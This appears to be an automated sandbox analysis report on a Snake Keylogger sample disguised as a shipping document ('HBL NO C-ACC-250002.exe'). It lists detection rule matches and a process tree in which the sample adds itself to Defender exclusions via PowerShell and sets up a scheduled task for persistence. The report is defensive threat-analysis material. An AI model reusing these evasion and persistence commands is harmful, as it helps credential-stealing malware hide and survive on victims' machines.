                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002D51000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2095748607.0000000007160000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000000.00000002.2091660215.0000000002EE4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameTL.dll" vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4496936697.0000000000AF7000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenamelfwhUWZlmFnGhDYPudAJ.exeX vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exeBinary or memory string: OriginalFilenamesPTL.exe2 vs HBL NO C-ACC-250002.exe
                Source: HBL NO C-ACC-250002.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.uyDicX.exe.3d3a148.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.uyDicX.exe.3d19728.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.uyDicX.exe.3d3a148.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 10.2.uyDicX.exe.3d19728.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000009.00000002.4496773905.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 0000000A.00000002.2125831840.0000000003D19000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: 00000000.00000002.2092629079.0000000003DB8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 2164, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: HBL NO C-ACC-250002.exe PID: 1960, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                Source: Process Memory Space: uyDicX.exe PID: 5144, type: MEMORYSTRMatched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
                Source: HBL NO C-ACC-250002.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: uyDicX.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, Z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3db8a68.6.raw.unpack, Z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, Z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3dd9488.5.raw.unpack, Z--.csCryptographic APIs: 'TransformFinalBlock'
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.IO.DirectoryInfo.SetAccessControl(System.Security.AccessControl.DirectorySecurity)
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, GW9cD1MmeOsIOgrcql.csSecurity API names: System.Security.AccessControl.FileSystemSecurity.AddAccessRule(System.Security.AccessControl.FileSystemAccessRule)
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.HBL NO C-ACC-250002.exe.3efe180.4.raw.unpack, iyFcKGg9tCppqGG5IB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.csSecurity API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
                Source: 0.2.HBL NO C-ACC-250002.exe.7160000.8.raw.unpack, iyFcKGg9tCppqGG5IB.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@19/15@3/3
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile created: C:\Users\user\AppData\Roaming\uyDicX.exeJump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMutant created: NULL
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4308:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6152:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6504:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5012:120:WilError_03
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeMutant created: \Sessions\1\BaseNamedObjects\xkvsFtVYwLIvCBOVLtigPPSEQi
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile created: C:\Users\user\AppData\Local\Temp\tmp61D1.tmpJump to behavior
                Source: HBL NO C-ACC-250002.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: HBL NO C-ACC-250002.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: HBL NO C-ACC-250002.exe, 00000009.00000002.4503070119.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D0B000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D41000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D4D000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002CFB000.00000004.00000800.00020000.00000000.sdmp, HBL NO C-ACC-250002.exe, 00000009.00000002.4499894132.0000000002D19000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002F79000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002F89000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002FBF000.00000004.00000800.00020000.00000000.sdmp, uyDicX.exe, 0000000E.00000002.4499608217.0000000002FCC000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: HBL NO C-ACC-250002.exeVirustotal: Detection: 43%
                Source: HBL NO C-ACC-250002.exeReversingLabs: Detection: 44%
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeFile read: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"
                Source: unknownProcess created: C:\Users\user\AppData\Roaming\uyDicX.exe C:\Users\user\AppData\Roaming\uyDicX.exe
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"
                Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\uyDicX.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp61D1.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeProcess created: C:\Users\user\Desktop\HBL NO C-ACC-250002.exe "C:\Users\user\Desktop\HBL NO C-ACC-250002.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\uyDicX" /XML "C:\Users\user\AppData\Local\Temp\tmp6EB2.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\uyDicX.exeProcess created: C:\Users\user\AppData\Roaming\uyDicX.exe "C:\Users\user\AppData\Roaming\uyDicX.exe"Jump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: mscoree.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: cryptsp.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: rsaenh.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: dwrite.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: windowscodecs.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: amsi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: gpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: iconcodecservice.dllJump to behavior
                Source: C:\Users\user\Desktop\HBL NO C-ACC-250002.exeSection loaded: propsys.dllJump to behavior
